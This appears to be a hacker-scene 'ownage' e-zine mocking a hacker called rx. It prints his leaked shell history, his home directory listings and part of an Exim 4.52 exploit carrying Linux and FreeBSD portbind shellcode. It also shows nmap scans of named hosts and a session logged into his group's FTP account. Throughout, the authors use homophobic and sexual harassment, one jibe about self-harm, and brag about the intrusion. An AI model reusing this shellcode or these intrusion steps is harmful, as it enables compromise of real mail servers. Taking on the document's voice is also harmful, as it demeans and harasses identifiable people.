mv util-linux-2.12r.tar.gz .tar/
tar zxvf exim-4.52.tar.gz
mv exim-4.52.tar.gz .tar/
cd exim-4.52/
ls
cd src
ls
grep strlcpy *
grep strcpy * <- t0ld y0u.
grep strcpy * >> ~/prv/txt/exim-strcpy.txt <- 3y3 th1nk y0u muzt h4v3 r34d sk3w'z 4ud1t1ng tut0r14l.
grep memcpy *
grep memcpy * >> ~/prv/txt/exim-memcpy.txt
grep memset *
grep memset * >> ~/prv/txt/exim-memset.txt
cd ~/prv/txt/
ls
mkdir vdev
mv exim-*.txt vdev/
cd vdev/
ls
cat exim-strcpy.txt
cd ../../c/audit/exim-4.52/src/
ls -l
ls ~/prv/txt/
ls ~/prv/txt/vdev/
grep -n strcpy * > ~/prv/txt/exim-strcpy.txt
grep -n memcpy * > ~/prv/txt/exim-memcpy.txt
grep -n memset * > ~/prv/txt/exim-memset.txt <- 4ll th1z grep'1ng 4nd y0u st1LL f0und _N0TH1NG_
cd ~/prv/txt/
ls
cat exim-memset.txt
ls
mv exim-* vdev/
cd vdev/
ls -l
cat exim-strcpy.txt
man Ustrcpy
cd ../../c/audit/exim-4.52/src/
^
--- g0nn4 h4q s0m3 .edu'z n0w w1th my n3wf0und smtpd aud1t1ng sk1llz.
ls
vim exim_lock.c
screen
ls
screen -r
screen -r keke
screen -r
screen -ls
screen -r
screen -ls
cd ~
clear
history | wc -l
screen -ln -S irc
clear
w
screen -r
screen -ln -S code
screen -list
w
last
w
ls -l
ls -l amn
cd amn
vi emopart.reasons <- h0no w0uld b3 v3ry s4d 1f y0u sl1t y0ur wr1stz!
cd ../prv/
ls
ls u
ls c
cd u ; gcc -o rfind rfind.c
vim rfind.c
gcc -o rfind rfind.c
vim rfind.c
gcc -o rfind rfind.c
vim rfind.c
gcc -o rfind rfind.c
vim rfind.c
gcc -o rfind rfind.c
vim rfind.c
ls -l
ls -l prv
ls prv/
cd prv/
chmod -x bab3.tgz
ls
chmod 600 bab3.tgz
ls
umask
mkdir ark
mv bab3.tgz ark
ls -l
cd ~
screen -r irc
screen -r code
ls -a
ls -a .amn
cd prv/ark/
ls
scp bab3.tgz rx@klope.rx90.be:~
ls -l
ls
ls -l
clear
md5sum bab3.tgz >> bab3.md5
ls -l
cat bab3.
cat bab3.md5
cat /etc/ssh/sshd_config <- w4tch0ut, h3 kn0wz c0nf1g f1l3z!@#
w
screen -ls
who
echo 'yo xtix, i'm about to go to sleep, but tommorow we can audit that openbsd bug.. and i found a bug in exim4.52 that i was working on today, and should be finished soon.. ttyl' >> tmp.txt
echo 'yo xtix, i\'m about to go to sleep, but tommorow we can audit that openbsd bug.. and i found a bug in exim4.52 that i was working on today, and should be finished soon.. ttyl' >> tmp.txt
echo "yo xtix, i\'m about to go to sleep, but tommorow we can audit that openbsd bug.. and i found a bug in exim4.52 that i was working on today, and should be finished soon.. ttyl" >> tmp.txt
cat tmp.txt | write rs
rm -f tmp.txt
ls
clear
who
tty
ps axwu | grep pty/4
ps axwu | grep pts/0
kill -9 19162
who
ls
cd prv ; ls
ls tmp
ls ark
ls txt
ls u
cd c
ls
epic5 -B -n lo3
cd prv/
cd prv/
w
ls
ls prv
mkdir prv img
mv img prv
mv *.gif prv/img/
rm arro
mv hfj.tgz prv/ark/
ls
wget ftp://ftp.ssh.com/pub/ssh/ssh-3.2.9.1.tar.gz &> /dev/null
wget ftp://ftp.ssh.com/pub/ssh/ssh-3.2.9.1.tar.gz.sig-gpg &> /dev/null
locate gnupg
cat ssh-3.2.9.1.tar.gz.sig-gpg
clear
unclear
clear
ls
clear
ls -la
ls -a .ss
ls -a .ssh/
w
ls /home/stfukthx/u
ls /home/stfukthx/
rm -fr /home/stfukthx/*
ls /home/stfukthx
cat .bash_profile
ls .ssh
# WOW
last | grep stfukthx
last
umask
umask 077
chmod 600 *
^^^^ y0ur chm0d sk1llz ar3 imp3cc4bl3.
ls -a
chmod 600 .*
ls -a
ls -a
chmod 777 .
umask
clear
ls
ls /home
ls -l /home | grep -n stfukthx
ls /home
ls /home/dhell
ls -l
w
ls /tmp
cd ..
tar cvzf rx.o rx -C /tmp
ls /tmp
w
clear
write rs
w
ls rx
cd rx
ls -la
wls
ls
write rx
write rs
echo 'storm got openssh-current/stable 0day'| write rs <- wh3r3z d4 0d4yz?????
clear
write rs
write rs
clear
w
cd prv/c
cd prv/
ls
cd prv/
ls -l
cd prv
ls prv
cd prv
c
cd c/
ls
cd audit/
ls
cd util-linux-2.12r/login-utils/
ls
grep strcpy chfn.c <- 0h n0! n0t m0r3 gr3p'1ng f0r strcpy()'z
cd ../../
cd ..
ls -l
gcc -o ircf ircfuzz.c <- l1k3 y0u c0uld 3xpl01t 4nyth1ng y0u f1nd w/ th1z!
./ircf
./ircf -h
./ircf asdrc2[uR3
ps awxu| grep ircf
ps awxu| grep irc
ls
cat ircf
clear
reset
clear
ls
cat ircfuzz.c
ls
./ircf
./ircf
./ircf irc.efnet.net
grep argv ircfuzz.c
grep argv 66666 <- th1z k1d l0v3z h1z grep
./ircf 444444
w
cd ~
w
w
wh3n y0u f1n4lly f1nd a vuLn l34v3 1t 1n /h0m3/h0no f0r us.
4ll w3 fuqn f0und 0f y0urz w4z p0rn.
[ro0t@jjj:/h0no]# tar -zxvf bab3.tgz
bab3/
bab3/h039.jpg
bab3/s02.jpg
bab3/s07.jpg
bab3/s08.jpg
bab3/s12.jpg
bab3/s14.jpg
bab3/h071.jpg
bab3/h075.jpg
bab3/h085.jpg
bab3/h094.jpg
bab3/h098.jpg
bab3/h133.jpg
bab3/u10.jpg
bab3/u11.jpg
bab3/u13.jpg
bab3/u14.jpg
bab3/a15.jpg
bab3/b05.jpg
bab3/b06.jpg
bab3/b08.jpg
[ro0t@jjj:/h0no]# tar -zxvf hfj.tgz
hfj/
hfj/hackforjes.us/
hfj/hackforjes.us/index.html
hfj/hackforjes.us/images/
hfj/hackforjes.us/images/407.jpg
hfj/hackforjes.us/images/mosthatedbbq.jpg <- th1z guy 1z l4m3, but h3'z h4ck3d m0r3 th4n y0u
hfj/hackforjes.us/images/P1010018.JPG
hfj/hackforjes.us/images/lesbo-chicken.jpeg
hfj/hackforjes.us/images/emmanuelbbq.jpg
hfj/hackforjes.us/images/captainchicken.jpg
hfj/hackforjes.us/images/clockfag.jpg
hfj/hackforjes.us/images/mitnichicken-octo.jpg
hfj/hackforjes.us/images/igorhep2.jpg
hfj/hackforjes.us/images/ziplockbbq.jpg
hfj/hackforjes.us/images/bbq-boobies.jpg
hfj/hackforjes.us/images/wouldntfuckdarkn3ss.jpg
hfj/hackforjes.us/images/chrakschicken.jpg
hfj/hackforjes.us/images/laveychicken.jpg
hfj/hackforjes.us/images/cvxdotbbq.jpg
hfj/hackforjes.us/images/lolsquito.jpg
hfj/hackforjes.us/images/chickenwing.jpg
hfj/hackforjes.us/images/mitnickchicken.jpg
hfj/hackforjes.us/images/rloxleyhasamustache4dp.jpg
hfj/hackforjes.us/images/shipleychicken.jpg
hfj/hackforjes.us/images/bronchicken.jpg
hfj/hackforjes.us/images/broncvixchicken.jpg
hfj/hackforjes.us/images/shilohchicken.jpg
hfj/hackforjes.us/images/bbq-setient.jpg
hfj/hackforjes.us/images/2600bbqsetient.jpg
hfj/hackforjes.us/images/bbq-chicken.jpg
hfj/hackforjes.us/Bar-B-Q Pope.mp3
[ro0t@jjj:/h0no]# ls -al
total 8
drwx------ 8 1002 users 1024 Jan 5 14:22 .
drwxr-xr-x 6 root root 1024 Jan 6 02:31 ..
drwx------ 4 1002 users 1024 Jan 6 02:47 ark
drwx------ 6 1002 users 1024 Jan 5 15:07 c
drwx------ 2 1002 1002 1024 Jan 5 14:22 img
drwx------ 2 1002 users 1024 Jan 2 07:37 tmp
drwx------ 4 1002 users 1024 Jan 3 17:03 txt
drwx------ 2 1002 users 1024 Jan 3 18:46 u
// w3 h4v3 f0und th3 3xtr3m3ly w3ll-h1dd3n 0day 4rch1v3.
// th4nk y0u f0r y0ur k1nd d0n4ti0n t0 h0no.
[ro0t@jjj:/h0no]# ls -al c
total 97
drwx------ 6 1002 users 1024 Jan 5 15:07 .
drwx------ 8 1002 users 1024 Jan 5 14:22 ..
-rw------- 1 1002 users 627 Jan 4 12:07 arro.c
drwx------ 4 1002 users 1024 Jan 3 16:52 audit
-rw-r--r-- 1 1002 users 528 Jan 2 02:04 beeper.S
-rw-r--r-- 1 1002 users 374 Jan 2 02:09 binsh.c
drwx------ 2 1002 users 1024 Jan 4 22:22 bof
-rw------- 1 1002 users 589 Jan 4 15:34 count.c
-rw-r--r-- 1 1002 users 229 Jan 2 02:04 execve.S
-rwx------ 1 1002 1002 20200 Jan 5 15:07 ircf
-rw------- 1 1002 1002 7832 Jan 5 15:07 ircfuzz.c
-rwx------ 1 1002 users 12990 Jan 2 11:14 loading
-rw------- 1 1002 users 1174 Jan 2 11:14 loading.c
-rwx------ 1 1002 users 12694 Jan 4 14:47 lol
-rw-r--r-- 1 1002 users 394 Jan 2 02:04 newyears.S
-rw------- 1 1002 users 1037 Jan 2 10:53 o0o.c
-rw------- 1 1002 users 966 Jan 3 18:20 prtbind-fbsd.S
-rw------- 1 1002 users 692 Jan 3 18:19 prtbind-linux.S
drwx------ 2 1002 users 1024 Jan 3 17:08 pub
-rw-r--r-- 1 1002 users 456 Jan 2 02:04 remfarslash.S
-rw------- 1 1002 users 2251 Jan 4 21:54 rx_exim4.c
^^^^ 0mg0mg0mg!$$!$ w3'v3 b33n try1ng t0 f1nd th1z 0hd4y f0r y34rz
s0 w3 k4n h4q 1nt0 4ll th0z3 .edu'z runn1ng exim
drwx------ 2 1002 users 1024 Jan 2 05:10 scrpt
-rwx------ 1 1002 users 13908 Jan 2 04:05 shex8
-rw-r--r-- 1 1002 users 1727 Jan 2 02:08 shex8.c
-rw------- 1 1002 users 553 Jan 2 06:23 suidperl.pl
// j4ckp0t! th3 z1n3 0f 4LL zin3z... c1zc0!@$$!%$
// w3'v3 b33n s34rch1ng f0r th1z c0v3t3d z1n3 f0r
// m4ny m0nthz. az y0u k4n pr0bably t3ll, 1t iz
// f0und3d by th3 gr34t h4ck3r r0t0r.
[ro0t@jjj:/h0no]# cd txt
[ro0t@jjj:/h0no/txt]# head -n10 zine.txt
echo -e " c1zc0 Security presents: c1zc0 zine "
echo -e " Editor: rotor "
echo -e " IRC: irc.efnet.org #c1zc0 "
echo -e " URL: http://www.c1zc0.com "
echo -e " This zine is dedicated to to my homie west "
// h0ly fuqn sh1t, th4t z1n3 w4z l4m3r th4n CDEJ. c0ngr4tz r0t0r!
// wh4tz 3v3n funn13r 1z th4t th3y d0ubl3-sp4c3d 4ll th31r sh1t
// s0 1t w0uld t4k3 up m0r3 sp4c3. h4h4h4. (th3y d0nt h4v3 3n0ugh
// k0nt3nt)
[ro0t@jjj:/h0no/txt]# cat me.txt
# nmap 3.81 scan initiated Mon Jan 2 07:38:43 2006 as: nmap -T4 -P0 -vv -oN me.txt klope.rx90.be
All 1663 scanned ports on c-66-31-110-65.hsd1.ma.comcast.net (66.31.110.65) are: filtered
# Nmap run completed at Mon Jan 2 07:48:01 2006 -- 1 IP address (1 host up) scanned in 558.239 seconds
[ro0t@jjj:/h0no/txt]# cat sux2bu-ver.txt
# nmap 3.81 scan initiated Tue Jan 3 16:47:01 2006 as: nmap -sV -P0 -T4 -vv -oN ../txt/sux2bu-ver.txt 216.32.94.58
Interesting ports on carbon.2uk2.com (216.32.94.58):
(The 1646 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE VERSION
21/tcp open ftp PureFTPd
23/tcp closed telnet
25/tcp open smtp Exim smtpd 4.52
26/tcp open smtp Exim smtpd 4.52
53/tcp open domain ISC Bind 9.2.4
80/tcp open http Apache httpd
110/tcp open pop3
143/tcp open imap UW Imapd 2003.339p-cpanel
443/tcp open http Apache httpd
993/tcp open ssl/imap UW Imapd 2003.339p-cpanel
995/tcp open ssl/pop3
1214/tcp closed fasttrack
3306/tcp open mysql MySQL (unauthorized)
4660/tcp closed mosmig
4672/tcp closed rfa
6346/tcp closed gnutella
6699/tcp closed napster
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port110-TCP:V=3.81%D=1/3%Time=43BAF123%P=i686-pc-linux-gnu%r(NULL,30,"\
SF:+OK\x20POP3\x20carbon\x20\[cppop\x2020\.0\]\x20at\x20\[216\.32\.94\.58\
SF:]\r\n")%r(GenericLines,6C,"\+OK\x20POP3\x20carbon\x20\[cppop\x2020\.0\]
SF:\x20at\x20\[216\.32\.94\.58\]\r\n-ERR\x20Command\x20not\x20implemented\
SF:r\n-ERR\x20Command\x20not\x20implemented\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port995-TCP:V=3.81%T=SSL%D=1/3%Time=43BAF133%P=i686-pc-linux-gnu%r(NULL
SF:,2D,"\+OK\x20POP3\x20carbon\x20\[cppop\x2020\.0\]\x20at\x20\[127\.0\.0\
SF:.1\]\r\n")%r(GenericLines,69,"\+OK\x20POP3\x20carbon\x20\[cppop\x2020\.
SF:0\]\x20at\x20\[127\.0\.0\.1\]\r\n-ERR\x20Command\x20not\x20implemented\
SF:r\n-ERR\x20Command\x20not\x20implemented\r\n");
# Nmap run completed at Tue Jan 3 16:48:40 2006 -- 1 IP address (1 host up) scanned in 99.065 seconds
// n0t3: th4tz az f4r az rx g0t wh3n h3 tr13d h4ck1ng c4rb0n.2uk2.c0m.
[ro0t@jjj:/h0no/txt]# cd ..
// uh 0h. 4scii p0rn 0day.
[ro0t@jjj:/h0no]# cat c/o0o.c
#include <stdio.h>
#include <string.h>
void make(char *s) {
fprintf(stderr, "\r%s", s);
usleep(rand()%60000+30000);
return;
}
int main(int argc, char **argv) {
printf("[+] hahaeaehaehae0eh0ae00eh0ha0\n");
while (1) {
make("8=(,,,)======D ({:})");
make("8==(,,,)=====D ({:})");
make("8===(,,,)====D ({:})");
make("8====(,,,)===D ({:})");
make("8=====(,,,)==D ({:})");
make("8======(,,,)=D ({:})");
make("8=====(,,,)==D ({:})");
make("8====(,,,)===D ({:})");
make("8===(,,,)====D ({:})");
make("8==(,,,)=====D ({:})");
make("8=(,,,)======D~ ({:})");
make("8==(,,,)=====D~ ~ ({:})");
make("8===(,,,)====D~ ~~ ({:})");
make("8====(,,,)===D ~ ~~~ ~ ({:})");
make("8=====(,,,)==D ~ ~~ ~({:})");
make("8======(,,,)=D ~~~ ~({:})");
}
return(0);
}
[ro0t@jjj:/h0no]# cat c/rx_exim4.c
/*
* exim smtpd <= 4.52
*
* by: rx
* website: http://www.corestorm.com
* email: rx @ corestorm.com
*
********************************************************
* @@@@@@@ @@@@@@ @@@@@@@ @@@@@@@@*
* !@@ @@! @@@ @@! @@@ @@! *
* !@! @!@ !@! @!@!!@! @!!!:! *
* :!! !!: !!! !!: :!! !!: *
* :: :: : : :. : : : : : :: :::*
* @@@@@@ @@@@@@@ @@@@@@ @@@@@@@ @@@@@@@@@@ *
* !@@ @@! @@! @@@ @@! @@@ @@! @@! @@!*
* !@@!! @!! @!@ !@! @!@!!@! @!! !!@ @!@*
* !:! !!: !!: !!! !!: :!! !!: !!:*
* ::.: : : : :. : : : : : : *
********************************************************
*
* bug in : exim-4.52/src/exim_lock.c
* function : strcpy()(lulz)
*
* ------------------------------------------------------
* KEEP THIS CODE FUCKING PRIVATE OR I'LL PUNCH UR FACE
* ------------------------------------------------------
*/
// [ uh 0h, rx 1z g0ing t0 punch uz. wh4t w1LL w3 d0? 0h w41t,
// h3'z alr34dy 0wn3d. l0lz. ]
#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#ifdef __FABSDEE
char opcode[] =
"\x31\xc0\x31\xc9\x99\x50\x6a\x01\x6a\x02\x50\xb0\x61\xcd\x80"
"\x92\x68\xaa\x02\xaa\xaa\x89\xe6\x6a\x10\x56\x52\xb0\x68\x6a"
"\x01\xcd\x80\x52\xb0\x6a\x51\xcd\x80\x50\x52\x99\xb0\x1e\x52"
"\xcd\x80\xb1\x03\x89\xc3\x53\xb0\x5a\x42\x52\xcd\x80\xe2\xf7"
"\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x51"
"\x53\x50\xb0\x5a\xcd\x80"; // 81b portbind // rx @ corestorm
#endif
#ifdef __LUNIX
char opcode[] =
"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80"; // 96b portbind // rx @ corestorm
#endif
void usage(char *);
int main(int argc, char **argv) {
int ch;
// h4h4h4h4h4h4h4h4h4... l4m3.
[ro0t@jjj:/h0no]# head -n4 c/suidperl.pl
#!/usr/bin/perl
#
# (c) rx
#
// w0w th4tz s0m3 eleet sh1t. wh4t, 1z th1z th3 fuqn 90z? suidperl 3xpl01tz.
w3 w0uld l1k3 t0 c0ngr4tul4t3 rx f0r h1z sup3r10r 4ud1t1ng sk1llz
(gr3p'1ng f0r strcpy 4nd m3mcpy 1z 3l1t3), 4nd h1z supr3m3
1n4b1l1ty t0 t4b h1z k0d3. y0u 4r3 l4m3. 4nd d0nt 3v3n try uz3 th3
3xcus3 th4t y0u w3r3 st0n3d, y0u m1dg3t fuck3r.
wh0 th3 fuck c0d3zz 4scii p0rn 4n1m4t10n pr0gr4mz 4nyw4y???
4r3 y0u s0 s3xu4lly d3pr1v3d th4t y0u h4v3 t0 r3s0rt t0 typ1ng
4scii p3n1s3s? 1tz n0t h4rd f0r 4 g4y m4n t0 g3t l41d. juzt g0
4sk bx, h3 m1ght 3v3n l3t y0u suck 0n h1z m4nb00bz 1f y0u g1v3
h1m 0d4y (w41t, y0u h4d n0n3).
1f y0u w4nt t0, y0u k4n s3nd h1m 4 l3tt3r. m4yb3 h3'll f33l y0ur
p41n 4nd t4k3 p1ty up0n y0ur p4th3t1c s0ul:
[l3tt3r]
d34r bx,
3y3 4m rx, a r34l h4ck3r l1k3 y0urs3lf. f0r my m4ny y34rz 4z
4 t33n4g3r 1'v3 b33n d3pr1v3d 0f s3x 1n 4ll f0rmz (0k, 3xc3pt
w1th my h4nd). 4z 4 y0ung t33n4g3r, 3y3 4m v3ry curi0uz ab0ut
s3x. h0no t0ld m3 th4t 1f 3y3 4sk n1c3ly, y0u w0uld h4v3
cyb3rs3x w1th m3? th3y sp3c1f1k4lly s41d th4t y0u'd l3t m3
suck 0n y0ur m4n b00bz. 0mg, l13k, d3wd, 3ye'v3 4lw4yz
dr34mt 0f such 4 t4sk. s1nc3 3y3 4m s0 n3w t0 s3x,
1'll b3 w1LL1ng t0 r3c31v3 1f w3 h4v3 4n4l. 1'd pr3m4tur3ly
3j4kul4t3 4nyw4yz :(. th4nk y0u, 4nd 3y3 4m l00k1ng f0rw4rd
t0 cyb3rs3x w1th y0u (PL34Z3!!).
l0v3,
rx
[/l3tt3r]
th3r3 y0u h4v3 1t, rx. m4k3 sur3 t0 k33p 1t 1n 3l1t3 sp34k, 0r 3lz3
h3 w1LL t0t4lly d1sr3g4rd 1t! bx 1z 0n 3fn3t 1n m4ny ch4nn3lz l1k3
#!bl4ckh4t. d0nt w0rry, 3fn3t 1zn't sn1ff3d, s0 f33l fr33 t0 t4k3 1t
t0 a pr1v8 msg. n3xt up 1z y0ur gr0up.. corestorm. h4r h4r h4r!
24.txt -~-~-~ th3 f41l3d corestorm t34m
rotor, nc, and tsao formed a group. corestorm.
<rotor> corestorm > dynamichell
<storm> haha
<storm> corestorm is gonna be the next teso
<storm> i'm telling you
<rotor> not teso
<storm> if we can get a solid team, we'll own *
<rotor> corestorm is the next w00w00 + teso
w3ll n0w! w1tH th4t s41d w3 h4d t0 s33 1f th3y h4d 4ny
w4r3z w0r7h st34l1n9!
ftp> open
(to) ftp.corestorm.com
Connected to premium6.ftp.geo.yahoo.akadns.net.
220-Welcome to the Yahoo! Web Hosting FTP server.
220-Need help? Get all details at:
220-http://help.yahoo.com/help/us/webhosting/gftp/
220-
220-No anonymous logins accepted.
220 Yahoo!
Name (ftp.corestorm.com:rs): corestormdotcom
331-Enter your Yahoo! member password
331
Password:
230-You are using 0.4% of your subscribed disk space
230-You have 4979.612 MB of space available
230
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /corestormdotcom/ .
total 1504
-rw-rw-r-- 1 1585250 1000000 8138 Jan 13 13:06 Kalle2.jpg
drwxrwxr-x 10 1585250 1000000 4096 Feb 17 19:19 board
drwxrwxr-x 2 1585250 1000000 4096 Dec 9 21:12 chicks
-rw-rw-r-- 1 1585250 1000000 22529 Dec 8 23:28 corestorm2.jpg
drwxrwxr-x 2 1585250 1000000 4096 Dec 16 23:36 cs
-rw-rw-r-- 1 1585250 1000000 1473 Jan 13 13:29 donations.htm
-rw-rw-r-- 1 1585250 1000000 2144 Dec 15 09:13 exp.pl
-rw-rw-r-- 1 1585250 1000000 12948 Dec 27 00:49 httpd
-rw-rw-r-- 1 1585250 1000000 1420 Jan 13 13:32 index.html
-rw-rw-r-- 1 1585250 1000000 12082 Jan 2 00:55 juno
drwxrwxr-x 12 1585250 1000000 4096 Dec 9 19:22 nuke
-rw-rw-r-- 1 1585250 1000000 11411 Dec 27 01:57 ptrace
drwxrwxr-x 2 1585250 1000000 4096 Jan 4 17:07 school
-rw-rw-r-- 1 1585250 1000000 625221 Dec 9 03:05 shV5.tgz
-rw-rw-r-- 1 1585250 1000000 10372 Dec 26 15:38 test1
drwxrwxr-x 2 1585250 1000000 4096 Jan 15 17:27 tmp
-rw-rw-r-- 1 1585250 1000000 14425 Jan 1 06:59 unrealircd.conf
226 Transfer complete.
ftp>
ftp> ls school
200 PORT command successful.
150 Opening ASCII mode data connection for /corestormdotcom/school .
total 16
-rw-rw-r-- 1 1585250 1000000 1479 Jan 4 17:07 page27.rtf
-rw-rw-r-- 1 1585250 1000000 1771 Jan 4 17:07 page28.rtf
226 Transfer complete.
ftp>
ftp> ls tmp
200 PORT command successful.
150 Opening ASCII mode data connection for /corestormdotcom/tmp .
total 16
-rw-rw-r-- 1 1585250 1000000 2144 Dec 15 09:14 exp.pl
-rw-rw-r-- 1 1585250 1000000 522 Dec 17 04:14 mailError.log
226 Transfer complete.
ftp>
# 0hd4y!, w3 w1ll l00k 4t th1z l4t3r th0u9h
ftp> ls nuke
200 PORT command successful.
150 Opening ASCII mode data connection for /corestormdotcom/nuke .
total 528
-rwxrwxr-x 1 1585250 1000000 8340 Dec 9 19:22 ADDONS-MODULES
-rwxrwxr-x 1 1585250 1000000 55576 Dec 9 19:22 CHANGES
-rwxrwxr-x 1 1585250 1000000 15515 Dec 9 19:22 COPYING
-rwxrwxr-x 1 1585250 1000000 2112 Dec 9 19:22 CREDITS
-rwxrwxr-x 1 1585250 1000000 8892 Dec 9 19:22 INSTALL
-rwxrwxr-x 1 1585250 1000000 2663 Dec 9 19:22 README
-rwxrwxr-x 1 1585250 1000000 1617 Dec 9 19:22 SUPPORT
-rwxrwxr-x 1 1585250 1000000 847 Dec 9 19:22 TODO
-rwxrwxr-x 1 1585250 1000000 2738 Dec 9 19:22 TRANSLATIONS
-rwxrwxr-x 1 1585250 1000000 319 Dec 9 19:22 UPGRADE
drwxrwxr-x 6 1585250 1000000 4096 Dec 9 19:22 admin
-rwxrwxr-x 1 1585250 1000000 14938 Dec 9 19:22 admin.php
-rwxrwxr-x 1 1585250 1000000 2323 Dec 9 19:22 auth.php
-rwxrwxr-x 1 1585250 1000000 2273 Dec 9 19:22 backend.php
-rwxrwxr-x 1 1585250 1000000 15545 Dec 9 19:22 banners.php
drwxrwxr-x 2 1585250 1000000 4096 Dec 9 19:22 blocks
-rwxrwxr-x 1 1585250 1000000 3208 Dec 9 19:22 config.php
-rwxrwxr-x 1 1585250 1000000 2921 Dec 9 19:22 footer.php
-rwxrwxr-x 1 1585250 1000000 2263 Dec 9 19:22 header.php
drwxrwxr-x 2 1585250 1000000 4096 Dec 9 19:22 html
drwxrwxr-x 13 1585250 1000000 4096 Dec 9 19:22 images
drwxrwxr-x 2 1585250 1000000 4096 Dec 9 19:22 includes
-rwxrwxr-x 1 1585250 1000000 2577 Dec 9 19:22 index.php
drwxrwxr-x 2 1585250 1000000 4096 Dec 9 19:22 language
-rwxrwxr-x 1 1585250 1000000 34041 Dec 9 19:22 mainfile.php
drwxrwxr-x 27 1585250 1000000 4096 Dec 9 19:22 modules
-rwxrwxr-x 1 1585250 1000000 3095 Dec 9 19:22 modules.php
-rwxrwxr-x 1 1585250 1000000 178 Dec 9 19:22 robots.txt
drwxrwxr-x 2 1585250 1000000 4096 Dec 9 19:22 sql
drwxrwxr-x 16 1585250 1000000 4096 Dec 9 19:22 themes
-rwxrwxr-x 1 1585250 1000000 179 Dec 9 19:22 ultramode.txt
drwxrwxr-x 2 1585250 1000000 4096 Dec 9 19:22 upgrades
226 Transfer complete.
ftp> ls chicks
200 PORT command successful.
150 Opening ASCII mode data connection for /corestormdotcom/chicks .
total 8024
-rw-rw-r-- 1 1585250 1000000 393532 Dec 9 21:11 1.jpg
-rw-rw-r-- 1 1585250 1000000 396014 Dec 9 21:11 2.jpg
-rw-rw-r-- 1 1585250 1000000 438116 Dec 9 21:12 3.jpg
-rw-rw-r-- 1 1585250 1000000 365869 Dec 9 21:11 4.jpg
-rw-rw-r-- 1 1585250 1000000 311166 Dec 9 21:11 5.jpg
-rw-rw-r-- 1 1585250 1000000 545608 Dec 9 21:12 6.jpg
-rw-rw-r-- 1 1585250 1000000 450395 Dec 9 21:12 7.jpg
-rw-rw-r-- 1 1585250 1000000 542301 Dec 9 21:12 8.jpg
-rw-rw-r-- 1 1585250 1000000 596270 Dec 9 21:12 9.jpg
-rw-rw-r-- 1 1585250 1000000 15775 Dec 9 21:06 candie.jpg
226 Transfer complete.
ftp> ls cs
200 PORT command successful.
150 Opening ASCII mode data connection for /corestormdotcom/cs .
total 8
-rw-rw-r-- 1 1585250 1000000 2549 Dec 16 23:36 CoreStorm-RPC-worm-PRIV.pl.pl
226 Transfer complete.
ftp>
# y3z! j4ckp0t b1tch3z, m0r3 0d4y th4n w00w00 + 7350
ftp> ls board
200 PORT command successful.
150 Opening ASCII mode data connection for /corestormdotcom/board .
total 1392
-rw-rw-r-- 1 1585250 1000000 4475 Dec 17 01:51 AcidTechTiger.cfg
-rw-rw-r-- 1 1585250 1000000 10700 Dec 17 01:51 AcidTechTiger.css
drwxrwxr-x 2 1585250 1000000 4096 Dec 17 01:49 admin
-rw-rw-r-- 1 1585250 1000000 1289 Dec 17 01:50 agreement.tpl
-rw-rw-r-- 1 1585250 1000000 2969 Dec 17 01:50 bbcode.tpl
drwxrwxr-x 2 1585250 1000000 4096 Dec 9 04:09 cache
-rw-rw-r-- 1 1585250 1000000 6678 Dec 9 04:09 common.php
-rw-rw-r-- 1 1585250 1000000 264 Dec 9 04:09 config.php
-rw-rw-r-- 1 1585250 1000000 1156 Dec 17 01:50 confirm_body.tpl
drwxrwxr-x 2 1585250 1000000 4096 Dec 9 04:09 db
drwxrwxr-x 2 1585250 1000000 4096 Dec 9 04:09 docs
-rw-rw-r-- 1 1585250 1000000 901 Dec 17 01:50 error_body.tpl
-rw-rw-r-- 1 1585250 1000000 810 Dec 9 04:09 extension.inc
-rw-rw-r-- 1 1585250 1000000 3643 Dec 9 04:09 faq.php
-rw-rw-r-- 1 1585250 1000000 2647 Dec 17 01:50 faq_body.tpl
-rw-rw-r-- 1 1585250 1000000 354 Dec 17 01:50 formIE.css
-rw-rw-r-- 1 1585250 1000000 8449 Dec 17 01:51 formStyle.js
-rw-rw-r-- 1 1585250 1000000 45807 Dec 9 04:09 groupcp.php
-rw-rw-r-- 1 1585250 1000000 7186 Dec 17 01:51 groupcp_info_body.tpl
-rw-rw-r-- 1 1585250 1000000 2314 Dec 17 01:50 groupcp_pending_info.tpl
-rw-rw-r-- 1 1585250 1000000 3630 Dec 17 01:51 groupcp_user_body.tpl
drwxrwxr-x 5 1585250 1000000 4096 Dec 17 01:50 images
drwxrwxr-x 2 1585250 1000000 4096 Dec 9 04:09 includes
-rw-rw-r-- 1 1585250 1000000 14648 Dec 9 04:09 index.php
-rw-rw-r-- 1 1585250 1000000 6812 Dec 17 01:51 index_body.tpl
-rw-rw-r-- 1 1585250 1000000 434 Dec 17 01:50 jumpbox.tpl
drwxrwxr-x 3 1585250 1000000 4096 Dec 9 04:09 language
-rw-rw-r-- 1 1585250 1000000 7830 Dec 9 04:09 login.php
-rw-rw-r-- 1 1585250 1000000 2146 Dec 17 01:50 login_body.tpl
-rw-rw-r-- 1 1585250 1000000 12148 Dec 9 04:09 memberlist.php
-rw-rw-r-- 1 1585250 1000000 2927 Dec 17 01:50 memberlist_body.tpl
-rw-rw-r-- 1 1585250 1000000 1106 Dec 17 01:50 message_body.tpl
